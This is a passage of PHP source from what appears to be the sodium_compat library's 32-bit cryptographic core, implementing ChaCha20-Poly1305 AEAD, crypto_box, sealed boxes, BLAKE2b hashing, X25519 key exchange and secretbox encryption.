        $state = new ParagonIE_Sodium_Core32_Poly1305_State($block0);
        try {
            ParagonIE_Sodium_Compat::memzero($block0);
        } catch (SodiumException $ex) {
            $block0 = null;
        }

        /** @var string $ciphertext - Raw encrypted data */
        $ciphertext = ParagonIE_Sodium_Core32_ChaCha20::streamXorIc(
            $message,
            $nonce,
            $key,
            ParagonIE_Sodium_Core32_Util::store64_le(1)
        );

        $state->update($ad);
        $state->update(ParagonIE_Sodium_Core32_Util::store64_le($adlen));
        $state->update($ciphertext);
        $state->update(ParagonIE_Sodium_Core32_Util::store64_le($len));
        return $ciphertext . $state->finish();
    }

    /**
     * AEAD Decryption with ChaCha20-Poly1305, IETF mode (96-bit nonce)
     *
     * @internal Do not use this directly. Use ParagonIE_Sodium_Compat.
     *
     * @param string $message
     * @param string $ad
     * @param string $nonce
     * @param string $key
     * @return string
     * @throws SodiumException
     * @throws TypeError
     */
    public static function aead_chacha20poly1305_ietf_decrypt(
        $message = '',
        $ad = '',
        $nonce = '',
        $key = ''
    ) {
        /** @var int $adlen - Length of associated data */
        $adlen = ParagonIE_Sodium_Core32_Util::strlen($ad);

        /** @var int $len - Length of message (ciphertext + MAC) */
        $len = ParagonIE_Sodium_Core32_Util::strlen($message);

        /** @var int  $clen - Length of ciphertext */
        $clen = $len - self::aead_chacha20poly1305_IETF_ABYTES;

        /** @var string The first block of the chacha20 keystream, used as a poly1305 key */
        $block0 = ParagonIE_Sodium_Core32_ChaCha20::ietfStream(
            32,
            $nonce,
            $key
        );

        /** @var string $mac - Message authentication code */
        $mac = ParagonIE_Sodium_Core32_Util::substr(
            $message,
            $len - self::aead_chacha20poly1305_IETF_ABYTES,
            self::aead_chacha20poly1305_IETF_ABYTES
        );

        /** @var string $ciphertext - The encrypted message (sans MAC) */
        $ciphertext = ParagonIE_Sodium_Core32_Util::substr(
            $message,
            0,
            $len - self::aead_chacha20poly1305_IETF_ABYTES
        );

        /* Recalculate the Poly1305 authentication tag (MAC): */
        $state = new ParagonIE_Sodium_Core32_Poly1305_State($block0);
        try {
            ParagonIE_Sodium_Compat::memzero($block0);
        } catch (SodiumException $ex) {
            $block0 = null;
        }
        $state->update($ad);
        $state->update(str_repeat("\x00", ((0x10 - $adlen) & 0xf)));
        $state->update($ciphertext);
        $state->update(str_repeat("\x00", (0x10 - $clen) & 0xf));
        $state->update(ParagonIE_Sodium_Core32_Util::store64_le($adlen));
        $state->update(ParagonIE_Sodium_Core32_Util::store64_le($clen));
        $computed_mac = $state->finish();

        /* Compare the given MAC with the recalculated MAC: */
        if (!ParagonIE_Sodium_Core32_Util::verify_16($computed_mac, $mac)) {
            throw new SodiumException('Invalid MAC');
        }

        // Here, we know that the MAC is valid, so we decrypt and return the plaintext
        return ParagonIE_Sodium_Core32_ChaCha20::ietfStreamXorIc(
            $ciphertext,
            $nonce,
            $key,
            ParagonIE_Sodium_Core32_Util::store64_le(1)
        );
    }

    /**
     * AEAD Encryption with ChaCha20-Poly1305, IETF mode (96-bit nonce)
     *
     * @internal Do not use this directly. Use ParagonIE_Sodium_Compat.
     *
     * @param string $message
     * @param string $ad
     * @param string $nonce
     * @param string $key
     * @return string
     * @throws SodiumException
     * @throws TypeError
     */
    public static function aead_chacha20poly1305_ietf_encrypt(
        $message = '',
        $ad = '',
        $nonce = '',
        $key = ''
    ) {
        /** @var int $len - Length of the plaintext message */
        $len = ParagonIE_Sodium_Core32_Util::strlen($message);

        /** @var int $adlen - Length of the associated data */
        $adlen = ParagonIE_Sodium_Core32_Util::strlen($ad);

        /** @var string The first block of the chacha20 keystream, used as a poly1305 key */
        $block0 = ParagonIE_Sodium_Core32_ChaCha20::ietfStream(
            32,
            $nonce,
            $key
        );
        $state = new ParagonIE_Sodium_Core32_Poly1305_State($block0);
        try {
            ParagonIE_Sodium_Compat::memzero($block0);
        } catch (SodiumException $ex) {
            $block0 = null;
        }

        /** @var string $ciphertext - Raw encrypted data */
        $ciphertext = ParagonIE_Sodium_Core32_ChaCha20::ietfStreamXorIc(
            $message,
            $nonce,
            $key,
            ParagonIE_Sodium_Core32_Util::store64_le(1)
        );

        $state->update($ad);
        $state->update(str_repeat("\x00", ((0x10 - $adlen) & 0xf)));
        $state->update($ciphertext);
        $state->update(str_repeat("\x00", ((0x10 - $len) & 0xf)));
        $state->update(ParagonIE_Sodium_Core32_Util::store64_le($adlen));
        $state->update(ParagonIE_Sodium_Core32_Util::store64_le($len));
        return $ciphertext . $state->finish();
    }

    /**
     * AEAD Decryption with ChaCha20-Poly1305, IETF mode (96-bit nonce)
     *
     * @internal Do not use this directly. Use ParagonIE_Sodium_Compat.
     *
     * @param string $message
     * @param string $ad
     * @param string $nonce
     * @param string $key
     * @return string
     * @throws SodiumException
     * @throws TypeError
     */
    public static function aead_xchacha20poly1305_ietf_decrypt(
        $message = '',
        $ad = '',
        $nonce = '',
        $key = ''
    ) {
        $subkey = ParagonIE_Sodium_Core32_HChaCha20::hChaCha20(
            ParagonIE_Sodium_Core32_Util::substr($nonce, 0, 16),
            $key
        );
        $nonceLast = "\x00\x00\x00\x00" .
            ParagonIE_Sodium_Core32_Util::substr($nonce, 16, 8);

        return self::aead_chacha20poly1305_ietf_decrypt($message, $ad, $nonceLast, $subkey);
    }

    /**
     * AEAD Encryption with ChaCha20-Poly1305, IETF mode (96-bit nonce)
     *
     * @internal Do not use this directly. Use ParagonIE_Sodium_Compat.
     *
     * @param string $message
     * @param string $ad
     * @param string $nonce
     * @param string $key
     * @return string
     * @throws SodiumException
     * @throws TypeError
     */
    public static function aead_xchacha20poly1305_ietf_encrypt(
        $message = '',
        $ad = '',
        $nonce = '',
        $key = ''
    ) {
        $subkey = ParagonIE_Sodium_Core32_HChaCha20::hChaCha20(
            ParagonIE_Sodium_Core32_Util::substr($nonce, 0, 16),
            $key
        );
        $nonceLast = "\x00\x00\x00\x00" .
            ParagonIE_Sodium_Core32_Util::substr($nonce, 16, 8);

        return self::aead_chacha20poly1305_ietf_encrypt($message, $ad, $nonceLast, $subkey);
    }

    /**
     * HMAC-SHA-512-256 (a.k.a. the leftmost 256 bits of HMAC-SHA-512)
     *
     * @internal Do not use this directly. Use ParagonIE_Sodium_Compat.
     *
     * @param string $message
     * @param string $key
     * @return string
     * @throws TypeError
     */
    public static function auth($message, $key)
    {
        return ParagonIE_Sodium_Core32_Util::substr(
            hash_hmac('sha512', $message, $key, true),
            0,
            32
        );
    }

    /**
     * HMAC-SHA-512-256 validation. Constant-time via hash_equals().
     *
     * @internal Do not use this directly. Use ParagonIE_Sodium_Compat.
     *
     * @param string $mac
     * @param string $message
     * @param string $key
     * @return bool
     * @throws SodiumException
     * @throws TypeError
     */
    public static function auth_verify($mac, $message, $key)
    {
        return ParagonIE_Sodium_Core32_Util::hashEquals(
            $mac,
            self::auth($message, $key)
        );
    }

    /**
     * X25519 key exchange followed by XSalsa20Poly1305 symmetric encryption
     *
     * @internal Do not use this directly. Use ParagonIE_Sodium_Compat.
     *
     * @param string $plaintext
     * @param string $nonce
     * @param string $keypair
     * @return string
     * @throws SodiumException
     * @throws TypeError
     */
    public static function box($plaintext, $nonce, $keypair)
    {
        return self::secretbox(
            $plaintext,
            $nonce,
            self::box_beforenm(
                self::box_secretkey($keypair),
                self::box_publickey($keypair)
            )
        );
    }

    /**
     * X25519-XSalsa20-Poly1305 with one ephemeral X25519 keypair.
     *
     * @internal Do not use this directly. Use ParagonIE_Sodium_Compat.
     *
     * @param string $message
     * @param string $publicKey
     * @return string
     * @throws SodiumException
     * @throws TypeError
     */
    public static function box_seal($message, $publicKey)
    {
        /** @var string $ephemeralKeypair */
        $ephemeralKeypair = self::box_keypair();

        /** @var string $ephemeralSK */
        $ephemeralSK = self::box_secretkey($ephemeralKeypair);

        /** @var string $ephemeralPK */
        $ephemeralPK = self::box_publickey($ephemeralKeypair);

        /** @var string $nonce */
        $nonce = self::generichash(
            $ephemeralPK . $publicKey,
            '',
            24
        );

        /** @var string $keypair - The combined keypair used in crypto_box() */
        $keypair = self::box_keypair_from_secretkey_and_publickey($ephemeralSK, $publicKey);

        /** @var string $ciphertext Ciphertext + MAC from crypto_box */
        $ciphertext = self::box($message, $nonce, $keypair);
        try {
            ParagonIE_Sodium_Compat::memzero($ephemeralKeypair);
            ParagonIE_Sodium_Compat::memzero($ephemeralSK);
            ParagonIE_Sodium_Compat::memzero($nonce);
        } catch (SodiumException $ex) {
            $ephemeralKeypair = null;
            $ephemeralSK = null;
            $nonce = null;
        }
        return $ephemeralPK . $ciphertext;
    }

    /**
     * Opens a message encrypted via box_seal().
     *
     * @internal Do not use this directly. Use ParagonIE_Sodium_Compat.
     *
     * @param string $message
     * @param string $keypair
     * @return string
     * @throws SodiumException
     * @throws TypeError
     */
    public static function box_seal_open($message, $keypair)
    {
        /** @var string $ephemeralPK */
        $ephemeralPK = ParagonIE_Sodium_Core32_Util::substr($message, 0, 32);

        /** @var string $ciphertext (ciphertext + MAC) */
        $ciphertext = ParagonIE_Sodium_Core32_Util::substr($message, 32);

        /** @var string $secretKey */
        $secretKey = self::box_secretkey($keypair);

        /** @var string $publicKey */
        $publicKey = self::box_publickey($keypair);

        /** @var string $nonce */
        $nonce = self::generichash(
            $ephemeralPK . $publicKey,
            '',
            24
        );

        /** @var string $keypair */
        $keypair = self::box_keypair_from_secretkey_and_publickey($secretKey, $ephemeralPK);

        /** @var string $m */
        $m = self::box_open($ciphertext, $nonce, $keypair);
        try {
            ParagonIE_Sodium_Compat::memzero($secretKey);
            ParagonIE_Sodium_Compat::memzero($ephemeralPK);
            ParagonIE_Sodium_Compat::memzero($nonce);
        } catch (SodiumException $ex) {
            $secretKey = null;
            $ephemeralPK = null;
            $nonce = null;
        }
        return $m;
    }

    /**
     * Used by crypto_box() to get the crypto_secretbox() key.
     *
     * @internal Do not use this directly. Use ParagonIE_Sodium_Compat.
     *
     * @param string $sk
     * @param string $pk
     * @return string
     * @throws SodiumException
     * @throws TypeError
     */
    public static function box_beforenm($sk, $pk)
    {
        return ParagonIE_Sodium_Core32_HSalsa20::hsalsa20(
            str_repeat("\x00", 16),
            self::scalarmult($sk, $pk)
        );
    }

    /**
     * @internal Do not use this directly. Use ParagonIE_Sodium_Compat.
     *
     * @return string
     * @throws Exception
     * @throws SodiumException
     * @throws TypeError
     */
    public static function box_keypair()
    {
        $sKey = random_bytes(32);
        $pKey = self::scalarmult_base($sKey);
        return $sKey . $pKey;
    }

    /**
     * @param string $seed
     * @return string
     * @throws SodiumException
     * @throws TypeError
     */
    public static function box_seed_keypair($seed)
    {
        $sKey = ParagonIE_Sodium_Core32_Util::substr(
            hash('sha512', $seed, true),
            0,
            32
        );
        $pKey = self::scalarmult_base($sKey);
        return $sKey . $pKey;
    }

    /**
     * @internal Do not use this directly. Use ParagonIE_Sodium_Compat.
     *
     * @param string $sKey
     * @param string $pKey
     * @return string
     * @throws TypeError
     */
    public static function box_keypair_from_secretkey_and_publickey($sKey, $pKey)
    {
        return ParagonIE_Sodium_Core32_Util::substr($sKey, 0, 32) .
            ParagonIE_Sodium_Core32_Util::substr($pKey, 0, 32);
    }

    /**
     * @internal Do not use this directly. Use ParagonIE_Sodium_Compat.
     *
     * @param string $keypair
     * @return string
     * @throws RangeException
     * @throws TypeError
     */
    public static function box_secretkey($keypair)
    {
        if (ParagonIE_Sodium_Core32_Util::strlen($keypair) !== 64) {
            throw new RangeException(
                'Must be ParagonIE_Sodium_Compat::CRYPTO_BOX_KEYPAIRBYTES bytes long.'
            );
        }
        return ParagonIE_Sodium_Core32_Util::substr($keypair, 0, 32);
    }

    /**
     * @internal Do not use this directly. Use ParagonIE_Sodium_Compat.
     *
     * @param string $keypair
     * @return string
     * @throws RangeException
     * @throws TypeError
     */
    public static function box_publickey($keypair)
    {
        if (ParagonIE_Sodium_Core32_Util::strlen($keypair) !== ParagonIE_Sodium_Compat::CRYPTO_BOX_KEYPAIRBYTES) {
            throw new RangeException(
                'Must be ParagonIE_Sodium_Compat::CRYPTO_BOX_KEYPAIRBYTES bytes long.'
            );
        }
        return ParagonIE_Sodium_Core32_Util::substr($keypair, 32, 32);
    }

    /**
     * @internal Do not use this directly. Use ParagonIE_Sodium_Compat.
     *
     * @param string $sKey
     * @return string
     * @throws RangeException
     * @throws SodiumException
     * @throws TypeError
     */
    public static function box_publickey_from_secretkey($sKey)
    {
        if (ParagonIE_Sodium_Core32_Util::strlen($sKey) !== ParagonIE_Sodium_Compat::CRYPTO_BOX_SECRETKEYBYTES) {
            throw new RangeException(
                'Must be ParagonIE_Sodium_Compat::CRYPTO_BOX_SECRETKEYBYTES bytes long.'
            );
        }
        return self::scalarmult_base($sKey);
    }

    /**
     * Decrypt a message encrypted with box().
     *
     * @internal Do not use this directly. Use ParagonIE_Sodium_Compat.
     *
     * @param string $ciphertext
     * @param string $nonce
     * @param string $keypair
     * @return string
     * @throws SodiumException
     * @throws TypeError
     */
    public static function box_open($ciphertext, $nonce, $keypair)
    {
        return self::secretbox_open(
            $ciphertext,
            $nonce,
            self::box_beforenm(
                self::box_secretkey($keypair),
                self::box_publickey($keypair)
            )
        );
    }

    /**
     * Calculate a BLAKE2b hash.
     *
     * @internal Do not use this directly. Use ParagonIE_Sodium_Compat.
     *
     * @param string $message
     * @param string|null $key
     * @param int $outlen
     * @return string
     * @throws RangeException
     * @throws SodiumException
     * @throws TypeError
     */
    public static function generichash($message, $key = '', $outlen = 32)
    {
        // This ensures that ParagonIE_Sodium_Core32_BLAKE2b::$iv is initialized
        ParagonIE_Sodium_Core32_BLAKE2b::pseudoConstructor();

        $k = null;
        if (!empty($key)) {
            /** @var SplFixedArray $k */
            $k = ParagonIE_Sodium_Core32_BLAKE2b::stringToSplFixedArray($key);
            if ($k->count() > ParagonIE_Sodium_Core32_BLAKE2b::KEYBYTES) {
                throw new RangeException('Invalid key size');
            }
        }

        /** @var SplFixedArray $in */
        $in = ParagonIE_Sodium_Core32_BLAKE2b::stringToSplFixedArray($message);

        /** @var SplFixedArray $ctx */
        $ctx = ParagonIE_Sodium_Core32_BLAKE2b::init($k, $outlen);
        ParagonIE_Sodium_Core32_BLAKE2b::update($ctx, $in, $in->count());

        /** @var SplFixedArray $out */
        $out = new SplFixedArray($outlen);
        $out = ParagonIE_Sodium_Core32_BLAKE2b::finish($ctx, $out);

        /** @var array<int, int> */
        $outArray = $out->toArray();
        return ParagonIE_Sodium_Core32_Util::intArrayToString($outArray);
    }

    /**
     * Finalize a BLAKE2b hashing context, returning the hash.
     *
     * @internal Do not use this directly. Use ParagonIE_Sodium_Compat.
     *
     * @param string $ctx
     * @param int $outlen
     * @return string
     * @throws SodiumException
     * @throws TypeError
     */
    public static function generichash_final($ctx, $outlen = 32)
    {
        if (!is_string($ctx)) {
            throw new TypeError('Context must be a string');
        }
        $out = new SplFixedArray($outlen);

        /** @var SplFixedArray $context */
        $context = ParagonIE_Sodium_Core32_BLAKE2b::stringToContext($ctx);

        /** @var SplFixedArray $out */
        $out = ParagonIE_Sodium_Core32_BLAKE2b::finish($context, $out);

        /** @var array<int, int> */
        $outArray = $out->toArray();
        return ParagonIE_Sodium_Core32_Util::intArrayToString($outArray);
    }

    /**
     * Initialize a hashing context for BLAKE2b.
     *
     * @internal Do not use this directly. Use ParagonIE_Sodium_Compat.
     *
     * @param string $key
     * @param int $outputLength
     * @return string
     * @throws RangeException
     * @throws SodiumException
     * @throws TypeError
     */
    public static function generichash_init($key = '', $outputLength = 32)
    {
        // This ensures that ParagonIE_Sodium_Core32_BLAKE2b::$iv is initialized
        ParagonIE_Sodium_Core32_BLAKE2b::pseudoConstructor();

        $k = null;
        if (!empty($key)) {
            $k = ParagonIE_Sodium_Core32_BLAKE2b::stringToSplFixedArray($key);
            if ($k->count() > ParagonIE_Sodium_Core32_BLAKE2b::KEYBYTES) {
                throw new RangeException('Invalid key size');
            }
        }

        /** @var SplFixedArray $ctx */
        $ctx = ParagonIE_Sodium_Core32_BLAKE2b::init($k, $outputLength);

        return ParagonIE_Sodium_Core32_BLAKE2b::contextToString($ctx);
    }

    /**
     * Initialize a hashing context for BLAKE2b.
     *
     * @internal Do not use this directly. Use ParagonIE_Sodium_Compat.
     *
     * @param string $key
     * @param int $outputLength
     * @param string $salt
     * @param string $personal
     * @return string
     * @throws RangeException
     * @throws SodiumException
     * @throws TypeError
     */
    public static function generichash_init_salt_personal(
        $key = '',
        $outputLength = 32,
        $salt = '',
        $personal = ''
    ) {
        // This ensures that ParagonIE_Sodium_Core32_BLAKE2b::$iv is initialized
        ParagonIE_Sodium_Core32_BLAKE2b::pseudoConstructor();

        $k = null;
        if (!empty($key)) {
            $k = ParagonIE_Sodium_Core32_BLAKE2b::stringToSplFixedArray($key);
            if ($k->count() > ParagonIE_Sodium_Core32_BLAKE2b::KEYBYTES) {
                throw new RangeException('Invalid key size');
            }
        }
        if (!empty($salt)) {
            $s = ParagonIE_Sodium_Core32_BLAKE2b::stringToSplFixedArray($salt);
        } else {
            $s = null;
        }
        if (!empty($salt)) {
            $p = ParagonIE_Sodium_Core32_BLAKE2b::stringToSplFixedArray($personal);
        } else {
            $p = null;
        }

        /** @var SplFixedArray $ctx */
        $ctx = ParagonIE_Sodium_Core32_BLAKE2b::init($k, $outputLength, $s, $p);

        return ParagonIE_Sodium_Core32_BLAKE2b::contextToString($ctx);
    }

    /**
     * Update a hashing context for BLAKE2b with $message
     *
     * @internal Do not use this directly. Use ParagonIE_Sodium_Compat.
     *
     * @param string $ctx
     * @param string $message
     * @return string
     * @throws SodiumException
     * @throws TypeError
     */
    public static function generichash_update($ctx, $message)
    {
        // This ensures that ParagonIE_Sodium_Core32_BLAKE2b::$iv is initialized
        ParagonIE_Sodium_Core32_BLAKE2b::pseudoConstructor();

        /** @var SplFixedArray $context */
        $context = ParagonIE_Sodium_Core32_BLAKE2b::stringToContext($ctx);

        /** @var SplFixedArray $in */
        $in = ParagonIE_Sodium_Core32_BLAKE2b::stringToSplFixedArray($message);

        ParagonIE_Sodium_Core32_BLAKE2b::update($context, $in, $in->count());

        return ParagonIE_Sodium_Core32_BLAKE2b::contextToString($context);
    }

    /**
     * Libsodium's crypto_kx().
     *
     * @internal Do not use this directly. Use ParagonIE_Sodium_Compat.
     *
     * @param string $my_sk
     * @param string $their_pk
     * @param string $client_pk
     * @param string $server_pk
     * @return string
     * @throws SodiumException
     * @throws TypeError
     */
    public static function keyExchange($my_sk, $their_pk, $client_pk, $server_pk)
    {
        return self::generichash(
            self::scalarmult($my_sk, $their_pk) .
            $client_pk .
            $server_pk
        );
    }

    /**
     * ECDH over Curve25519
     *
     * @internal Do not use this directly. Use ParagonIE_Sodium_Compat.
     *
     * @param string $sKey
     * @param string $pKey
     * @return string
     *
     * @throws SodiumException
     * @throws TypeError
     */
    public static function scalarmult($sKey, $pKey)
    {
        $q = ParagonIE_Sodium_Core32_X25519::crypto_scalarmult_curve25519_ref10($sKey, $pKey);
        self::scalarmult_throw_if_zero($q);
        return $q;
    }

    /**
     * ECDH over Curve25519, using the basepoint.
     * Used to get a secret key from a public key.
     *
     * @param string $secret
     * @return string
     *
     * @throws SodiumException
     * @throws TypeError
     */
    public static function scalarmult_base($secret)
    {
        $q = ParagonIE_Sodium_Core32_X25519::crypto_scalarmult_curve25519_ref10_base($secret);
        self::scalarmult_throw_if_zero($q);
        return $q;
    }

    /**
     * This throws an Error if a zero public key was passed to the function.
     *
     * @param string $q
     * @return void
     * @throws SodiumException
     * @throws TypeError
     */
    protected static function scalarmult_throw_if_zero($q)
    {
        $d = 0;
        for ($i = 0; $i < self::box_curve25519xsalsa20poly1305_SECRETKEYBYTES; ++$i) {
            $d |= ParagonIE_Sodium_Core32_Util::chrToInt($q[$i]);
        }

        /* branch-free variant of === 0 */
        if (-(1 & (($d - 1) >> 8))) {
            throw new SodiumException('Zero public key is not allowed');
        }
    }

    /**
     * XSalsa20-Poly1305 authenticated symmetric-key encryption.
     *
     * @internal Do not use this directly. Use ParagonIE_Sodium_Compat.
     *
     * @param string $plaintext
     * @param string $nonce
     * @param string $key
     * @return string
     * @throws SodiumException
     * @throws TypeError
     */
    public static function secretbox($plaintext, $nonce, $key)
    {
        /** @var string $subkey */
        $subkey = ParagonIE_Sodium_Core32_HSalsa20::hsalsa20($nonce, $key);

        /** @var string $block0 */
        $block0 = str_repeat("\x00", 32);

        /** @var int $mlen - Length of the plaintext message */
        $mlen = ParagonIE_Sodium_Core32_Util::strlen($plaintext);
        $mlen0 = $mlen;
        if ($mlen0 > 64 - self::secretbox_xsalsa20poly1305_ZEROBYTES) {
            $mlen0 = 64 - self::secretbox_xsalsa20poly1305_ZEROBYTES;
        }
        $block0 .= ParagonIE_Sodium_Core32_Util::substr($plaintext, 0, $mlen0);

        /** @var string $block0 */
        $block0 = ParagonIE_Sodium_Core32_Salsa20::salsa20_xor(
            $block0,
            ParagonIE_Sodium_Core32_Util::substr($nonce, 16, 8),
            $subkey
        );

        /** @var string $c */
        $c = ParagonIE_Sodium_Core32_Util::substr(
            $block0,
            self::secretbox_xsalsa20poly1305_ZEROBYTES
        );
        if ($mlen > $mlen0) {
            $c .= ParagonIE_Sodium_Core32_Salsa20::salsa20_xor_ic(
                ParagonIE_Sodium_Core32_Util::substr(
                    $plaintext,
                    self::secretbox_xsalsa20poly1305_ZEROBYTES
                ),
                ParagonIE_Sodium_Core32_Util::substr($nonce, 16, 8),
                1,
                $subkey
            );
        }
        $state = new ParagonIE_Sodium_Core32_Poly1305_State(
            ParagonIE_Sodium_Core32_Util::substr(
                $block0,
                0,
                self::onetimeauth_poly1305_KEYBYTES
            )
        );
        try {
            ParagonIE_Sodium_Compat::memzero($block0);
            ParagonIE_Sodium_Compat::memzero($subkey);
        } catch (SodiumException $ex) {
            $block0 = null;
            $subkey = null;
        }

        $state->update($c);

        /** @var string $c - MAC || ciphertext */
        $c = $state->finish() . $c;
        unset($state);

        return $c;
    }

    /**
     * Decrypt a ciphertext generated via secretbox().
     *
     * @internal Do not use this directly. Use ParagonIE_Sodium_Compat.
     *
     * @param string $ciphertext
     * @param string $nonce
     * @param string $key
     * @return string
     * @throws SodiumException
     * @throws TypeError
     */
    public static function secretbox_open($ciphertext, $nonce, $key)
    {
        /** @var string $mac */
        $mac = ParagonIE_Sodium_Core32_Util::substr(
            $ciphertext,
            0,
            self::secretbox_xsalsa20poly1305_MACBYTES
        );

        /** @var string $c */
        $c = ParagonIE_Sodium_Core32_Util::substr(
            $ciphertext,
            self::secretbox_xsalsa20poly1305_MACBYTES
        );

        /** @var int $clen */
        $clen = ParagonIE_Sodium_Core32_Util::strlen($c);

        /** @var string $subkey */
        $subkey = ParagonIE_Sodium_Core32_HSalsa20::hsalsa20($nonce, $key);

        /** @var string $block0 */
        $block0 = ParagonIE_Sodium_Core32_Salsa20::salsa20(
            64,
            ParagonIE_Sodium_Core32_Util::substr($nonce, 16, 8),
            $subkey
        );
        $verified = ParagonIE_Sodium_Core32_Poly1305::onetimeauth_verify(
            $mac,
            $c,
            ParagonIE_Sodium_Core32_Util::substr($block0, 0, 32)
        );
        if (!$verified) {
            try {
                ParagonIE_Sodium_Compat::memzero($subkey);
            } catch (SodiumException $ex) {
                $subkey = null;
            }
            throw new SodiumException('Invalid MAC');
        }

        /** @var string $m - Decrypted message */
        $m = ParagonIE_Sodium_Core32_Util::xorStrings(
            ParagonIE_Sodium_Core32_Util::substr($block0, self::secretbox_xsalsa20poly1305_ZEROBYTES),
            ParagonIE_Sodium_Core32_Util::substr($c, 0, self::secretbox_xsalsa20poly1305_ZEROBYTES)
        );
        if ($clen > self::secretbox_xsalsa20poly1305_ZEROBYTES) {
            // We had more than 1 block, so let's continue to decrypt the rest.
            $m .= ParagonIE_Sodium_Core32_Salsa20::salsa20_xor_ic(
                ParagonIE_Sodium_Core32_Util::substr(
                    $c,
                    self::secretbox_xsalsa20poly1305_ZEROBYTES
                ),
                ParagonIE_Sodium_Core32_Util::substr($nonce, 16, 8),
                1,
                (string) $subkey
            );
        }
        return $m;
    }

    /**
     * XChaCha20-Poly1305 authenticated symmetric-key encryption.
     *
     * @internal Do not use this directly. Use ParagonIE_Sodium_Compat.
     *
     * @param string $plaintext
     * @param string $nonce
     * @param string $key
     * @return string
     * @throws SodiumException
     * @throws TypeError
     */
    public static function secretbox_xchacha20poly1305($plaintext, $nonce, $key)
    {
        /** @var string $subkey */
        $subkey = ParagonIE_Sodium_Core32_HChaCha20::hChaCha20(
            ParagonIE_Sodium_Core32_Util::substr($nonce, 0, 16),
            $key
        );
        $nonceLast = ParagonIE_Sodium_Core32_Util::substr($nonce, 16, 8);

        /** @var string $block0 */
        $block0 = str_repeat("\x00", 32);

        /** @var int $mlen - Length of the plaintext message */
        $mlen = ParagonIE_Sodium_Core32_Util::strlen($plaintext);
        $mlen0 = $mlen;
        if ($mlen0 > 64 - self::secretbox_xchacha20poly1305_ZEROBYTES) {
            $mlen0 = 64 - self::secretbox_xchacha20poly1305_ZEROBYTES;
        }
        $block0 .= ParagonIE_Sodium_Core32_Util::substr($plaintext, 0, $mlen0);

        /** @var string $block0 */
        $block0 = ParagonIE_Sodium_Core32_ChaCha20::streamXorIc(
            $block0,
            $nonceLast,
            $subkey
        );

        /** @var string $c */
        $c = ParagonIE_Sodium_Core32_Util::substr(
            $block0,
            self::secretbox_xchacha20poly1305_ZEROBYTES
        );
        if ($mlen > $mlen0) {
            $c .= ParagonIE_Sodium_Core32_ChaCha20::streamXorIc(
                ParagonIE_Sodium_Core32_Util::substr(
                    $plaintext,
                    self::secretbox_xchacha20poly1305_ZEROBYTES
                ),
                $nonceLast,
                $subkey,
                ParagonIE_Sodium_Core32_Util::store64_le(1)
            );
        }
        $state = new ParagonIE_Sodium_Core32_Poly1305_State(
            ParagonIE_Sodium_Core32_Util::substr(
                $block0,
                0,
                self::onetimeauth_poly1305_KEYBYTES
            )
        );
        try {
            ParagonIE_Sodium_Compat::memzero($block0);
            ParagonIE_Sodium_Compat::memzero($subkey);
        } catch (SodiumException $ex) {
            $block0 = null;
            $subkey = null;
        }

        $state->update($c);

        /** @var string $c - MAC || ciphertext */
        $c = $state->finish() . $c;
        unset($state);

        return $c;
    }

    /**
     * Decrypt a ciphertext generated via secretbox_xchacha20poly1305().
     *
     * @internal Do not use this directly. Use ParagonIE_Sodium_Compat.
     *
     * @param string $ciphertext
     * @param string $nonce
     * @param string $key
     * @return string
     * @throws SodiumException
     * @throws TypeError
     */
    public static function secretbox_xchacha20poly1305_open($ciphertext, $nonce, $key)
    {
        /** @var string $mac */
        $mac = ParagonIE_Sodium_Core32_Util::substr(
            $ciphertext,
            0,
            self::secretbox_xchacha20poly1305_MACBYTES
        );

        /** @var string $c */
        $c = ParagonIE_Sodium_Core32_Util::substr(
            $ciphertext,
            self::secretbox_xchacha20poly1305_MACBYTES
        );

        /** @var int $clen */
        $clen = ParagonIE_Sodium_Core32_Util::strlen($c);

        /** @var string $subkey */
        $subkey = ParagonIE_Sodium_Core32_HChaCha20::hchacha20($nonce, $key);

        /** @var string $block0 */
        $block0 = ParagonIE_Sodium_Core32_ChaCha20::stream(
            64,
            ParagonIE_Sodium_Core32_Util::substr($nonce, 16, 8),
            $subkey
        );
        $verified = ParagonIE_Sodium_Core32_Poly1305::onetimeauth_verify(
            $mac,
            $c,
            ParagonIE_Sodium_Core32_Util::substr($block0, 0, 32)
        );

        if (!$verified) {
            try {
                ParagonIE_Sodium_Compat::memzero($subkey);
            } catch (SodiumException $ex) {
                $subkey = null;
            }
            throw new SodiumException('Invalid MAC');
        }

        /** @var string $m - Decrypted message */
        $m = ParagonIE_Sodium_Core32_Util::xorStrings(
            ParagonIE_Sodium_Core32_Util::substr($block0, self::secretbox_xchacha20poly1305_ZEROBYTES),
            ParagonIE_Sodium_Core32_Util::substr($c, 0, self::secretbox_xchacha20poly1305_ZEROBYTES)
        );

        if ($clen > self::secretbox_xchacha20poly1305_ZEROBYTES) {
            // We had more than 1 block, so let's continue to decrypt the rest.
            $m .= ParagonIE_Sodium_Core32_ChaCha20::streamXorIc(
                ParagonIE_Sodium_Core32_Util::substr(
                    $c,
                    self::secretbox_xchacha20poly1305_ZEROBYTES
                ),
                ParagonIE_Sodium_Core32_Util::substr($nonce, 16, 8),
                (string) $subkey,
                ParagonIE_Sodium_Core32_Util::store64_le(1)
            );
        }
        return $m;
    }

    /**
     * @param string $key
     * @return array<int, string> Returns a state and a header.
     * @throws Exception
     * @throws SodiumException
     */
    public static function secretstream_xchacha20poly1305_init_push($key)
    {
        # randombytes_buf(out, crypto_secretstream_xchacha20poly1305_HEADERBYTES);
        $out = random_bytes(24);

        # crypto_core_hchacha20(state->k, out, k, NULL);
        $subkey = ParagonIE_Sodium_Core32_HChaCha20::hChaCha20($out, $key);
        $state = new ParagonIE_Sodium_Core32_SecretStream_State(
            $subkey,
            ParagonIE_Sodium_Core32_Util::substr($out, 16, 8) . str_repeat("\0", 4)
        );

        # _crypto_secretstream_xchacha20poly1305_counter_reset(state);
        $state->counterReset();

        # memcpy(STATE_INONCE(state), out + crypto_core_hchacha20_INPUTBYTES,
        #        crypto_secretstream_xchacha20poly1305_INONCEBYTES);
        # memset(state->_pad, 0, sizeof state->_pad);
        return array(
            $state->toString(),
            $out
        );
    }

    /**
     * @param string $key
     * @param string $header
     * @return string Returns a state.
     * @throws Exception
     */
    public static function secretstream_xchacha20poly1305_init_pull($key, $header)
    {
        # crypto_core_hchacha20(state->k, in, k, NULL);
        $subkey = ParagonIE_Sodium_Core32_HChaCha20::hChaCha20(
            ParagonIE_Sodium_Core32_Util::substr($header, 0, 16),
            $key
        );
        $state = new ParagonIE_Sodium_Core32_SecretStream_State(
            $subkey,
            ParagonIE_Sodium_Core32_Util::substr($header, 16)
        );
        $state->counterReset();
